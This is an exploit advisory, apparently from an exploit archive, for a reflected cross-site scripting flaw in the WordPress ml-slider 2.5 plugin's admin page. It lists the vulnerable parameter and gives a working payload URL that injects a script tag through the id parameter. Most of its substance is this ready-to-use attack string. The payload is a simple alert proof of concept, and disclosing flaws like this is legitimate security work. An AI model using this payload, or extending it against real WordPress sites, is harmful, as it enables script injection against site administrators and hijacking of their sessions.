######################
# Exploit Title : Wordpress ml-slider 2.5 Cross Site Scripting

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://wordpress.org/plugins/ml-slider

# Software Link : downloads.wordpress.org/plugin/ml-slider.2.5.zip

# Date : 2014-06-27

# Tested on : Windows 7 / Mozilla Firefox
######################

# Location : http://localhost/wp-admin/admin.php?page=metaslider&id=1[xss]


# Exploit:  
http://localhost/wp-admin/admin.php?page=metaslider&id=1"/><script>alert(1);</script>

#####################

Discovered By : ACC3SS

#####################